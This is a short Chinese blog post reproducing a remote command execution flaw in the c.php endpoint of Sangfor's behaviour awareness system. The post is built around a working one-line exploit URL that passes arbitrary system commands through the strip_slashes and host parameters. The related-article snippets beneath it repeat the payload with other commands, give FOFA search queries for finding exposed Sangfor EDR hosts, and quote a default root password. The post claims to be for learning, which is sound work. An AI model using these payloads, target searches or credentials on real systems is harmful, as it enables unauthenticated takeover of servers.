深信服 行为感知系统 c.php 远程命令执行漏洞

最新推荐文章于 2024-07-17 00:00:00 发布
最新推荐文章于 2024-07-17 00:00:00 发布
阅读量984 收藏
点赞数
分类专栏: 漏洞复现 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46801402/article/details/127764994
版权

漏洞描述:

深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行

漏洞利用条件:

/

漏洞影响范围:

行为感知系统

漏洞复现:

1.POC:/tool/log/c.php?strip_slashes=system&host=ipconfig

 

修复建议:

关注厂商修复漏洞

学习记录过程仅供参考!!!

想要暴富的小林子
关注
专栏目录
【1day】复现深信服应用交付管理系统 login 远程命令执行漏洞和账号密码泄漏漏洞
记录并分享学习安全的知识点..
08-16 801
深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问,导致账号密码泄漏;深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
深信服数据中心管理系统 XXE漏洞复现
0xSec
08-16 2403
深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析,攻击者可以利用该漏洞进行XML注入攻击,获取系统敏感信息。
深信服行为感知命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 4817
深信服 行为感知系统c.php远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行。其实整个过程和深信服EDR命令执行漏洞差不多。其实整个URL和EDR差不多。
漏洞复现】深信服 行为感知系统 日志中心 c.php 远程命令执行
最新发布
凝聚力安全团队
07-17 326
深信服 行为感知系统 日志中心 c.php存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限
深信服行为感知系统&&日志中心 远程命令执行漏洞
西米安全
06-07 2820
标题 声明 1、该公众号发布文章仅供学习使用。 2、请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 漏洞描述 深信服行为感知系统&&日志中心 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行 影响范围 深信服 行为感知系统日志中心 漏洞复现 漏洞地址: /tool/log/c.php?strip_slashes=system&host= 首页: 执行: https://ip/tool/log/c.php?strip_sla
深信服edr终端漏洞
qq_40806924的博客
08-20 4442
一、前言 最近这些天来了广州当蓝方,工作之余听到了几个朋友说关于深信服edr爆0day的情况,自己也没时间复现,就简单记录一下。 该XXX简介: 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 ** 二、影响范围 fofa上大概有37页
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1840
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
2021 HW 漏洞清单汇总 ( 附 poc )
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
深信服SCSA安全工程师题库(方便大家复习备考)
a5a8a45的博客
04-11 1万+
1、【EDR】下列哪个端口是紧急情况下EDR管理平台和客户端通信端口,即紧急情况下用于下发Agent重启、Agent卸载和Agent停止等指令。( ) A:443.0 B:54120.0 C:8083.0 D:8088.0 正确答案B 2、【EDR】客户有7000个终端需要安装EDR客户端进行安全防护, 请问推荐部署多少个EDR管理平台( ) A:1个 B:2个 C:4个 D:6个 正确答案C 3、【EDR】EDR的Agent客户端不支持在以下哪种类型的终端上安装( ) A:Windows Server B
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
SANGFOR_AC_v13.0.7_上网行为管理系统用户手册
10-16
官网V13.0.7版本的深信服全网行为管理的用户手册,上网行为管理的详细配置说明及配置案例,希望对大家有帮助。
红队系列-溯源与应急反制专题
aming小老弟
11-09 474
日志分析、流量特征分析、内存马。
深信服行为感知系统和终端检测响应平台EDR REC复现渗透测试
kelenwait的博客
06-24 1821
简介 深信服行为感知系统和终端检测响应平台EDR是深信服科技股份有限公司推出的安全产品,其行为感知系统 c.php 存在远程命令执行漏洞,与其相同模板的还有部分EDR,同样导致远程命令执行漏洞影响 深信服EDR 3.2.16 深信服EDR 3.2.17 深信服EDR 3.2.19 深信服 行为感知系统 漏洞复现 登录界面 c.php 远程命令执行漏洞 使用以下poc进行访问 /tool/log/c.php?strip_slashes=system&host=echo hello /tool/l
行为管理篇】01. 恢复出厂及登录 ❀ 深信服上网行为管理
热门推荐
防火墙技术专栏
06-05 3万+
看似正常的上网行为背后,潜藏着诸多看不见的风险,上网管理需要可视可控。深信服上网行为管理就是专门针对上网进行管理的设备。象任何网络安全设备一样,当我们不记得密码或登录IP的时候,可以通过恢复出厂设置,来达到我们的登录的目的。...
深信服PHP,深信服终端检测响应平台 EDR 代码审计
weixin_30089411的博客
03-19 2521
今年 HW 深信服的 EDR 爆出了一些很低级的漏洞,也看到网上不少人再吐槽,国光也忍不住来分析复现看看。基本配置信息网上地下流传的深信服的 EDR ISO 文件实际上是 CentOS7 镜像,下面国光简单分享记录一下相关信息,然后面看到的朋友少走弯路。首先 ISO 安装的话,不要使用快速安装,直接挂载即可,相关的账号密码为:用户名密码rootedr@sangfor安装完成默认是静态 IP,得配置...
深信服终端检测响应平台EDR-远程命令执行漏洞
chaojixiaojingang
08-21 2336
1.漏洞描述 深信服终端检测响应平台EDR存在远程命令执行漏洞,通过远程访问目标文件,造成远程命令执行,获取服务器完全控制权限。 2.资产查找 Fofa: app="深信服-终端检测响应平台EDR" 3.漏洞复现 1)访问深信服终端检测响应平台:https://xx.xx.xx.37/ui/login.php 2)远程访问目标文件:https://xx.xx.xx.37/tool/log/c.php 3)远程命令执行:https://xx.xx.xx.37/tool/lo...
深信服EDR终端检测平台-任意用户登录漏洞复现
thelostworld
08-20 2147
又是一觉醒来,深信服EDR又出oday了????,心疼一秒???? ​ 源码被大部分人下载了,估计连夜审计了一波,官网就停止下载的链接了 简介: EDR简介(来自官方): 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。 端点软件支持防病毒功能、入侵防御
深信服EDR(终端检测响应平台)远程命令执行
Websec
08-18 4409
深信服edr远程命令执行复现 1、POC http:xxxxxx/tool/log/c.php?strip_slashes=system&host=id 2、FOFA语法 语法 title="终端检测响应平台" https://fofa.so/result?q=%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94%E5%B9%B3%E5%8F%B0 3、案例复现 漏洞页面: ...
深信服edr代码审计:远程命令执行漏洞分析(RCE)
本文主要讨论了深信服edr终端检测响应平台在3.2.21之前的版本中存在的一个严重安全问题,即远程命令执行漏洞。这种类型的漏洞通常允许攻击者通过注入恶意代码来执行任意系统命令,对系统安全性构成重大威胁。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值